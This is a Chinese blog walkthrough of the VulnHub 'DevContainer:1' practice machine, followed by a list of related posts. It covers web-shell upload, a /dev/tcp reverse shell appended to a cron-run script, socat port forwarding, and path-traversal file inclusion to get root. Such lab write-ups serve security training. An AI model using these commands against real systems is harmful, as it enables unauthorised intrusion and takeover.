VulnHub渗透测试实战靶场 - DevContainer:1

最新推荐文章于 2023-04-08 16:56:38 发布
最新推荐文章于 2023-04-08 16:56:38 发布
阅读量442 收藏 2
点赞数
分类专栏: # VulnHub 文章标签: VulnHub 渗透测试 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LYJ20010728/article/details/119881370
版权

VulnHub渗透测试实战靶场 - DevContainer:1

题目描述

Goal: 2 flagas
Difficulty: Easy-intermediate
Information: Your feedback is appreciate:
Twitter: @0x04E1

This works better with VirtualBox rather than VMware

环境下载

DevContainer:1靶机搭建

  1. 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
  2. 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
  • 目标靶机的 IP 地址为:192.168.56.108
  • 攻击机的 IP 地址为:192.168.56.102

渗透测试

信息搜集

用 Nmap 扫描一下目标靶机的端口信息:sudo nmap -sS -A 192.168.56.108,发现开放了 80 端口

用 dirb 扫描一下 80 端口 web 目录:dirb http://192.168.56.108

漏洞挖掘

  • 根据 dirb 扫描结果,访问 http://192.168.56.108/upload/ 发现文件上传页面,并根据 F12 查看页面源码发现的注释,猜测存在文件上传漏洞
  • 利用 Kali 自带的 PHP-Shell,修改后缀名为允许上传的文件后缀名,再利用 burpsuite 抓包修改上传文件信息

getshell

  • 用 nc 起一个监听,访问上传的文件,成功接收到反弹的 shell
  • 将 shell 变为交互式的 shell
SHELL=/bin/bash script -q /dev/null

提权

  • 进一步查找信息,在 /var/www/html 目录下发现一个可疑目录 Maintenance-Web-Docker
  • 其中 list.sh 可写,尝试写入一个反向 shell
echo "bash -i >& /dev/tcp/192.168.56.102/4444 0>&1" >> list.sh
  • 通过查看 out.txt 我们发现每一分钟运行一次 list.sh,开启 nc 监听后等一会成功接收到反弹的 shell

Flag-1

  • 在家目录下的 user.txt 成功得到 Flag-1
  • 注意到存在一个目录 HackTools
  • 运行命令:/home/richard/HackTools/socat TCP-LISTEN\:8080\,fork TCP\:127.0.0.1\:90,并查看一下 90 端口上运行着什么
  • 访问 http://192.168.56.108:8080/,测试后发现存在文件包含漏洞

Flag-2

  • 包含之前上传的 shell,访问 http://192.168.56.108:8080/index.php?view=../../../../../../home/richard/web/upload/files/shells.php
  • 开启监听,成功接收到反弹的 shell,拿到 root 权限,成功拿到 Flag-2
H3rmesk1t
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hack the box oopsie 靶场练习
鸥鹭忘机
07-30 1096
扫描收集信息 今天来练习hack the box中的oopsie靶场,如何连接这里不做过多赘述。 连接过程可以参考上一篇博客进行了解:https://blog.csdn.net/rpsate/article/details/119190220 首先扫描一下端口与服务信息 nmap -sV -F 10.10.10.28 -sV 代表扫描端口和开放的服务信息 -F 快速扫描,扫描常用的端口 好我们看到了开放了80端口,应该是一台WEB服务器,我们通过浏览器访问一下这个IP试一下。 果然出现了网页,
htb(二)
wanan的博客
03-11 1689
htb(二)
Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记
ZhangAweio的博客
04-08 2830
入门的靶机是非常适合刚入门的小伙伴,拿去练习,虽然挑战性不大,但是还是很有必要去来练习的,这个主要是考察一个很简单的渗透过程,在真实环境当中,需要我们更多的是随机应变,加油网安人,让我们一起共同进步吧!
vulnhub靶场-BoredHackerBlog: Cloud AV
qq_42947816的博客
05-10 888
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场Matrix-Breakout 2 Morpheus教程
m0_73248913的博客
01-22 3992
蚁剑的文件不是完整的,可能会有隐藏文件,此处简单一点直接在反弹shell双管齐下(一句话魔改一下)(记得要弄url编码)(干掉问号和空格和&)系统是Linux4.x|5.x看看有没有漏洞能利用,直接发现有漏洞能直接用CVE-2022-0847。此处有一个file变量,那么改变file变量可以直接对靶机文件修改,升值能随意创建文件。下载下去直接传上去跑就行(蚁剑直接传上去就可以了)(或者使用shell直接吓到靶机里)去到我进来写的shell看到一个图片看看,直接访问,毕竟没有扫出来。
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-prime:1
06-05
vuInhub靶场实战系列-prime:1
vuInhub靶场实战系列-prime:2
最新发布
06-08
vuInhub靶场实战系列-prime:2
vulnhub靶场实战系列-DC-2实战
05-18
vulnhub靶场实战系列-DC-2实战
Vulnhub靶场Prime_Series_Level-1渗透
m0_65712192的博客
02-12 1582
Vulnhub靶场Prime_Series_Level-1渗透
devcontainer 靶机
m0_66299232的博客
10-05 404
9.因为他是以sudo权限开放的8080端口 说明这是root权限,我们直接再次触发第一次传入的木马,进行反弹shell,来提权。3.扫下http://192.168.1.106/upload 这个目录 ,发现文件上传路径。nmap -p- -A -T4 192.168.1.106 //探测目标靶机开放端口和服务。4.查看list.sh目录和out.txt 目录后,我直接进行反弹shell命令写入。1.扫目录发现一个/upload 是一个能上传文件的界面 ,是一个白名单的文件上传。
vulnhub-DEVCONTAINER: 1
qq_43400414的博客
07-03 217
一、环境搭建 下载地址: https://www.vulnhub.com/entry/devcontainer-1,548/ 靶场描述: Goal:2flagas Difficulty:Easy-intermediate Information:Yourfeedbackisappreciate: Twitter:@0x04E1 ThisworksbetterwithVirtualBoxratherthanVmware 配置IP地址 参考:https://www.cn...
Hacker The Box 之 Oopsie 9
Angelxiqi的博客
05-03 1642
内容篇幅略长,创作不易,感谢支持!
树莓派搭建个人服务器
li123128的博客
10-25 787
  阅读目录      前言      docker安装      mysql安装      redis安装      gogs安装      内外穿透      其他安装      树莓派还能做什么      资源消耗截图      结束      前言      上一篇树莓派也跑Docker和.NET Core有对树莓派做简单的介绍。包括系统的烧录、基本的设置、docker的安装、.net c...
DEFCON CHINA&BCTF的一些随笔
郁离歌丶的博客
05-14 3750
萌新的第一次线下决赛,毫无意外的被打爆,打扰了我太菜了,告辞!下面记录一下这次的收获吧。靶场渗透这次靶场是打的真的爽,也学习了很多东西。从一个博客开始到服务器到内网最后拿域控权限,打的真的爽啊。这里有5个flag,我们在拿域控,靶场总共6个flag。然后最开始博客的服务器里面我早就发现了一个pwn,应该最后一个flag。唯一的遗憾是没时间了,mimikatz没升级,拿ms14-068打的时候缺少p...
vulnhub-DEVCONTAINER: 1-DEVCONTAINER
yutianovo的博客
09-16 534
靶机描述 Goal: 2 flagas Difficulty: Easy-intermediate Information: Your feedback is appreciate: Twitter: @0x04E1 This works better with VirtualBox rather than VMware 下载 https://www.vulnhub.com/entry/devcontainer-1,548/ 清单 信息搜集 netdiscover nmap dir 利用 文
shell编程之——/dev/null作用
qq_36412715的博客
11-02 443
cat /dev/null > tmp #清空tmp文件。 若tmp文件不存在,则会创建一个空的tmp文件,若tmp文件存在,则会清空tmp文件。 cat filename >/dev/null #禁止标准输出 可以把/dev/null看作"黑洞"。它非常等价于一个只写文件,所有写入它的内容都会永远丢失,而尝试从它那儿读取内容则什么也读不到. ...
Linux中关于/dev/null 的解释
choufengyin7439的博客
11-06 361
在Linux/Unix中,一般在屏幕上面看到的信息是从stdout (standard output) 或者 stderr (standard error output) 来的。许多人会问,output 就是 output,送到屏幕上不就得了,为什麼还要分成stdout 和 stderr 呢?...
web渗透测试靶场cms
09-06
你可以尝试一些知名的Web渗透测试靶场CMS,如DVWA(Damn Vulnerable Web Application)、OWASP Juice Shop和WebGoat。这些靶场CMS都是为了帮助安全专业人员和开发者学习和实践Web渗透测试技术而设计的,它们提供了各种漏洞和安全问题供你尝试攻击和修复。 DVWA是一个非常受欢迎的靶场CMS,它包含了多个安全漏洞,例如SQL注入、跨站脚本攻击(XSS)和文件上传漏洞等。OWASP Juice Shop是一个现代化的Web应用程序,旨在模拟真实世界中常见的安全问题。WebGoat是另一个非常受欢迎的靶场CMS,它提供了一系列挑战和实验,帮助你学习各种Web应用程序漏洞。 通过使用这些靶场CMS,你可以积极主动地学习和测试不同类型的Web应用程序漏洞,提高你的渗透测试技能。记得在使用靶场CMS进行渗透测试时,要遵守法律和道德规范,并且只在合法的环境中进行测试

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值